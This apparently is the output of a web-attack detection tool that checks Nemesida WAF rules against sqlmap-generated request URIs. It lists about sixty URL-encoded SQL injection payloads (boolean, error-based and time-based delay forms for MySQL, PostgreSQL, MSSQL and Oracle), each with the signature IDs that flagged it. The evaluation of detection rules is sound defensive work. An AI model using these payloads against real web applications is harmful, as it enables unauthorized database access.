# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l sqlmap.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o nemesida/sqlmap.clean
Packet [11]	Uri [/web%29%20AND%203639%3D1491%20AND%20%286185%3D6185]	Nattacks [1]	Signatures	[300002728]
Packet [12]	Uri [/web%29%20AND%206404%3D6404%20AND%20%281217%3D1217]	Nattacks [1]	Signatures	[300002728]
Packet [13]	Uri [/web%29%20AND%206404%3D6404%20AND%20%281217%3D1217]	Nattacks [1]	Signatures	[300002728]
Packet [16]	Uri [/web%27%29%20AND%208069%3D2336%20AND%20%28%27KpFl%27%3D%27KpFl]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [17]	Uri [/web%27%29%20AND%206404%3D6404%20AND%20%28%27yQra%27%3D%27yQra]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [18]	Uri [/web%27%20AND%206896%3D8139%20AND%20%27torv%27%3D%27torv]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [19]	Uri [/web%27%20AND%206896%3D8139%20AND%20%27torv%27%3D%27torv]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [20]	Uri [/web%27%20AND%206404%3D6404%20AND%20%27jEQS%27%3D%27jEQS]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [21]	Uri [/web%27%20AND%206404%3D6404%20AND%20%27jEQS%27%3D%27jEQS]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [22]	Uri [/web%20AND%206498%3D6322--%20fUtf]	Nattacks [2]	Signatures	[300000068]	[300002749]
Packet [23]	Uri [/web%20AND%206404%3D6404--%20oIhy]	Nattacks [2]	Signatures	[300000068]	[300002749]
Packet [26]	Uri [/web%29%20AND%20EXTRACTVALUE%282720%2CCONCAT%280x5c%2C0x717a787171%2C%28SELECT%20%28ELT%282720%3D2720%2C1%29%29%29%2C0x717a626a71%29%29%20AND%20%286919%3D6919]	Nattacks [1]	Signatures	[300002728]
Packet [28]	Uri [/web%27%29%20AND%20EXTRACTVALUE%282720%2CCONCAT%280x5c%2C0x717a787171%2C%28SELECT%20%28ELT%282720%3D2720%2C1%29%29%29%2C0x717a626a71%29%29%20AND%20%28%27UEWU%27%3D%27UEWU]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [29]	Uri [/web%27%20AND%20EXTRACTVALUE%282720%2CCONCAT%280x5c%2C0x717a787171%2C%28SELECT%20%28ELT%282720%3D2720%2C1%29%29%29%2C0x717a626a71%29%29%20AND%20%27ZBiC%27%3D%27ZBiC]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [31]	Uri [/web%29%20AND%204277%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284277%3D4277%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%282854%3D2854]	Nattacks [3]	Signatures	[300000034]	[300001497]	[300002728]
Packet [32]	Uri [/web%20AND%204277%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284277%3D4277%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29]	Nattacks [2]	Signatures	[300000034]	[300001497]
Packet [33]	Uri [/web%27%29%20AND%204277%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284277%3D4277%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27cIyp%27%3D%27cIyp]	Nattacks [5]	Signatures	[300000034]	[300000052]	[300001497]	[300002728]	[300002763]
Packet [34]	Uri [/web%27%20AND%204277%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284277%3D4277%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27liZN%27%3D%27liZN]	Nattacks [5]	Signatures	[300000034]	[300000052]	[300001497]	[300002728]	[300002763]
Packet [35]	Uri [/web%20AND%204277%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284277%3D4277%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20qLkN]	Nattacks [3]	Signatures	[300000034]	[300000068]	[300001497]
Packet [36]	Uri [/web%29%20AND%201149%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281149%3D1149%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%284030%3D4030]	Nattacks [2]	Signatures	[300001497]	[300002728]
Packet [37]	Uri [/web%20AND%201149%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281149%3D1149%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29]	Nattacks [1]	Signatures	[300001497]
Packet [38]	Uri [/web%27%29%20AND%201149%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281149%3D1149%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27zOro%27%3D%27zOro]	Nattacks [4]	Signatures	[300000052]	[300001497]	[300002728]	[300002763]
Packet [39]	Uri [/web%27%20AND%201149%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281149%3D1149%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%27yTwr%27%3D%27yTwr]	Nattacks [4]	Signatures	[300000052]	[300001497]	[300002728]	[300002763]
Packet [40]	Uri [/web%20AND%201149%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281149%3D1149%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--%20nPsw]	Nattacks [2]	Signatures	[300000068]	[300001497]
Packet [41]	Uri [/web%29%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%282327%3D2327]	Nattacks [3]	Signatures	[300000034]	[300001497]	[300002728]
Packet [42]	Uri [/web%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29]	Nattacks [2]	Signatures	[300000034]	[300001497]
Packet [43]	Uri [/web%27%29%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27pUda%27%3D%27pUda]	Nattacks [5]	Signatures	[300000034]	[300000052]	[300001497]	[300002728]	[300002763]
Packet [44]	Uri [/web%27%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27jNQG%27%3D%27jNQG]	Nattacks [5]	Signatures	[300000034]	[300000052]	[300001497]	[300002728]	[300002763]
Packet [45]	Uri [/web%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20Bqrf]	Nattacks [3]	Signatures	[300000034]	[300000068]	[300001497]
Packet [46]	Uri [/%28SELECT%20CONCAT%28CONCAT%28%27qzxqq%27%2C%28CASE%20WHEN%20%287101%3D7101%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qzbjq%27%29%29]	Nattacks [2]	Signatures	[300000052]	[300001063]
Packet [53]	Uri [/web%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001063]
Packet [54]	Uri [/web%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001063]
Packet [55]	Uri [/web%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001063]
Packet [56]	Uri [/web%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001063]
Packet [57]	Uri [/web%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001063]
Packet [58]	Uri [/web%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001063]
Packet [59]	Uri [/web%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001063]
Packet [60]	Uri [/web%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [3]	Signatures	[300000051]	[300000068]	[300001497]
Packet [61]	Uri [/web%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [3]	Signatures	[300000051]	[300000068]	[300001497]
Packet [62]	Uri [/web%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [3]	Signatures	[300000051]	[300000068]	[300001497]
Packet [63]	Uri [/web%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001497]
Packet [64]	Uri [/web%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300000068]	[300001497]
Packet [65]	Uri [/web%29%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%289253%3D9253]	Nattacks [1]	Signatures	[300002728]
Packet [66]	Uri [/web%29%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%289253%3D9253]	Nattacks [1]	Signatures	[300002728]
Packet [67]	Uri [/web%29%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%289253%3D9253]	Nattacks [1]	Signatures	[300002728]
Packet [68]	Uri [/web%29%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%289253%3D9253]	Nattacks [1]	Signatures	[300002728]
Packet [73]	Uri [/web%27%29%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%28%27JdTr%27%3D%27JdTr]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [74]	Uri [/web%27%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%27LTUN%27%3D%27LTUN]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [77]	Uri [/web%29%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29%20AND%20%281073%3D1073]	Nattacks [1]	Signatures	[300002728]
Packet [79]	Uri [/web%27%29%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27bIug%27%3D%27bIug]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [80]	Uri [/web%27%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29%20AND%20%27pcaP%27%3D%27pcaP]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [81]	Uri [/web%27%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29%20AND%20%27pcaP%27%3D%27pcaP]	Nattacks [3]	Signatures	[300000052]	[300002728]	[300002763]
Packet [83]	Uri [/web%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%287403%3D7403]	Nattacks [3]	Signatures	[300000052]	[300001063]	[300002728]
Packet [84]	Uri [/web%20WAITFOR%20DELAY%20%270%3A0%3A5%27]	Nattacks [2]	Signatures	[300000052]	[300001063]
Packet [85]	Uri [/web%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27ZQHW%27%3D%27ZQHW]	Nattacks [4]	Signatures	[300000052]	[300001063]	[300002728]	[300002763]
Packet [86]	Uri [/web%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27GJCE%27%3D%27GJCE]	Nattacks [4]	Signatures	[300000052]	[300001063]	[300002728]	[300002763]
Packet [87]	Uri [/web%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20Eagi]	Nattacks [3]	Signatures	[300000052]	[300000068]	[300001063]
Packet [88]	Uri [/web%29%20AND%202495%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%28111%29%7C%7CCHR%2880%29%7C%7CCHR%2873%29%2C5%29%20AND%20%288973%3D8973]	Nattacks [2]	Signatures	[300001497]	[300002728]
Packet [89]	Uri [/web%20AND%202495%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%28111%29%7C%7CCHR%2880%29%7C%7CCHR%2873%29%2C5%29]	Nattacks [1]	Signatures	[300001497]
Packet [90]	Uri [/web%27%29%20AND%202495%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%28111%29%7C%7CCHR%2880%29%7C%7CCHR%2873%29%2C5%29%20AND%20%28%27OCGu%27%3D%27OCGu]	Nattacks [4]	Signatures	[300000052]	[300001497]	[300002728]	[300002763]
Packet [91]	Uri [/web%27%29%20AND%202495%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%28111%29%7C%7CCHR%2880%29%7C%7CCHR%2873%29%2C5%29%20AND%20%28%27OCGu%27%3D%27OCGu]	Nattacks [4]	Signatures	[300000052]	[300001497]	[300002728]	[300002763]
Packet [92]	Uri [/web%27%20AND%202495%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%28111%29%7C%7CCHR%2880%29%7C%7CCHR%2873%29%2C5%29%20AND%20%27ribW%27%3D%27ribW]	Nattacks [4]	Signatures	[300000052]	[300001497]	[300002728]	[300002763]
Packet [93]	Uri [/web%20AND%202495%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%28111%29%7C%7CCHR%2880%29%7C%7CCHR%2873%29%2C5%29--%20BOMh]	Nattacks [2]	Signatures	[300000068]	[300001497]
# N. packets [98], [63] with alerts, N. Alerts [181]
# Execution time: 0.047834 s
